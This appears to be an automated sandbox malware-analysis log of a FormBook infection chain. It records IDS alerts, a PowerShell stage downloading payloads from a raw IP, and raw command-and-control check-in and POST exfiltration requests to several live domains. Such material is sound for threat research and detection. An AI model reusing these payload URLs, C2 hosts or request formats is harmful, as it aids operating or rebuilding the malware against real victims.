                    Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.1829565622.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.1831959392.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, cleanmgr.exe, 0000000F.00000003.1829565622.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.1831959392.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: cleanmgr.pdb source: TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000B84000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: aspnet_compiler.pdb source: cleanmgr.exe, 0000000F.00000002.2579593004.000000000555C000.00000004.10000000.00040000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2567427488.000000000322B000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000002.2579590373.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2132405296.0000000020D4C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1789795161.0000000007010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1791049317.000000000748A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: cleanmgr.pdbGCTL source: TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000B84000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q6C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.pdb source: powershell.exe, 00000001.00000002.1466721064.0000000005437000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1789795161.0000000007010000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1791049317.000000000748A000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 15_2_02EAC3F0 FindFirstFileW,FindNextFileW,FindClose,15_2_02EAC3F0

                    Software Vulnerabilities

                    barindex
                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 4x nop then xor eax, eax15_2_02E99BA0
                    Source: C:\Windows\SysWOW64\cleanmgr.exeCode function: 4x nop then mov ebx, 00000004h15_2_04C704E8

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.9:49722 -> 146.70.155.254:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49840 -> 172.67.163.245:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49840 -> 172.67.163.245:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49877 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49883 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49921 -> 184.94.215.26:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49934 -> 184.94.215.26:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49934 -> 184.94.215.26:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49914 -> 184.94.215.26:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49927 -> 184.94.215.26:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49972 -> 185.151.30.221:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.9:49898 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49972 -> 185.151.30.221:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49957 -> 185.151.30.221:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:49898 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49966 -> 185.151.30.221:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49950 -> 185.151.30.221:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:49889 -> 3.33.130.190:80
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.9:49738
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1150/CRMMA.txt HTTP/1.1Host: 146.70.155.254Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 184.94.215.26 184.94.215.26
                    Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
                    Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
                    Source: Joe Sandbox ViewASN Name: VXCHNGE-NC01US VXCHNGE-NC01US
                    Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                    Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                    Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 146.70.155.254
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_03664BB0 URLDownloadToFileW,1_2_03664BB0
                    Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1150/createabetterbuttersmoothsmoothykingstogetmesweeetness.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 146.70.155.254Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1150/CRMMA.txt HTTP/1.1Host: 146.70.155.254Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /15nb/?ozM=pHXpHpbXjHh&tHv=Hgx7D7c94bF86Gv92+yjgs/yvRJ2LxxXy6gMxHkS7HMnVUr5oc0+TmqN38rGM6nu+PH6deqPjc/6oqr55b0ehJlYtckfPgfvzmtbNAVJOGyxKh5z9A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.fzaqzjja.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /1vmx/?tHv=9kGBXZxppSQGpsPva2hO1+7FFAv7jYBlVf8dDAttQ7XT+XAQL8eiKk2eaOwq2QP12Mcq0wHIaRfipn6rrYH4WdTaAnEdft+eZsAaNr4LIp/0Hia2Jg==&ozM=pHXpHpbXjHh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.artherapy.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /omdp/?ozM=pHXpHpbXjHh&tHv=HeMu8D5S7ALw33d30qwp+iVrSIOapV1+fOAS6dt6/K50LaCJgK98+ja3O2AONA8l3lWptpqiQiqaFmpVL4TMP9Av2zmNEjnairAXee7lUtaK+ZtXcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sportvas.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /8c06/?tHv=G4zWZ0Nj9PVJ//SN6EOJwpki1UYI7dgFbJbLjGF7v5OX+CcR7h02x2GjssIYZd7u3AEUas9bYAKQeEUSIZlmjpsG1PZQEmg3WvSe6jra0p9x5IWDpQ==&ozM=pHXpHpbXjHh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.pegji.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                    Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: www.fzaqzjja.shop
                    Source: global trafficDNS traffic detected: DNS query: www.artherapy.online
                    Source: global trafficDNS traffic detected: DNS query: www.sportvas.online
                    Source: global trafficDNS traffic detected: DNS query: www.pegji.online
                    Source: unknownHTTP traffic detected: POST /1vmx/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.artherapy.onlineOrigin: http://www.artherapy.onlineReferer: http://www.artherapy.online/1vmx/Content-Length: 192Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-T530 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 74 48 76 3d 77 6d 75 68 55 74 63 71 68 78 4d 47 30 74 72 63 56 47 4e 76 36 37 53 70 45 47 7a 66 67 62 63 48 64 74 73 62 45 42 4e 4c 57 4b 54 4b 2b 31 64 39 4e 73 75 51 54 53 6d 6f 66 4c 63 50 31 69 53 66 6c 38 41 42 6c 67 6e 6c 62 41 44 49 35 68 44 4c 69 71 66 4e 62 38 6a 70 46 46 45 69 64 62 6e 31 48 76 73 50 44 70 6b 71 65 4d 4b 52 50 30 66 30 61 73 62 52 74 42 49 59 37 48 73 41 45 6a 65 70 43 41 2f 67 67 45 4f 6b 38 71 48 37 65 77 44 36 5a 77 6f 61 7a 2f 65 48 56 47 4f 6b 79 73 6f 61 73 59 31 76 47 65 76 30 6b 33 61 4b 56 68 68 4e 36 31 44 42 6c 7a 6d 41 6a 76 50 70 Data Ascii: tHv=wmuhUtcqhxMG0trcVGNv67SpEGzfgbcHdtsbEBNLWKTK+1d9NsuQTSmofLcP1iSfl8ABlgnlbADI5hDLiqfNb8jpFFEidbn1HvsPDpkqeMKRP0f0asbRtBIY7HsAEjepCA/ggEOk8qH7ewD6Zwoaz/eHVGOkysoasY1vGev0k3aKVhhN61DBlzmAjvPp
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:50:44 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 72 6f 74 61 74 65 70 61 6f 7b 0a 20 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74 65 28 30 64 65 67 29 7d 0a 20 20 35 30 25 20 2c 20 36 30 25 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 20 72 6f 74 61 74
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:50:47 GMTServer: ApacheContent-Length: 13840Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 6c 65 66 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 31 35 30 70 78 20 31 35 36 70 78 3b 0a 7d 0a 0a 2e 72 69 67 68 74 2d 73 70 61 72 6b 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6c 65 66 74 2d 73 70 61 72 6b 73 20 20 20 34 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 33 31 30 70 78 20 31 35 30 70 78 3b 0a 7d 0a 0a 2e 6f 6c 68 6f 73 7b 61 6e 69 6d 61 74 69 6f 6e 3a 20 6f 6c 68 6f 73 20 20 20 32 73 20 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 73 7b 0a 20 20 66 72 6f 6d 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 30 2e 39 38 29 7d 0a 20 20 74 6f 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 31 29 7d 0a 7d 0a 0a 40 6b 65 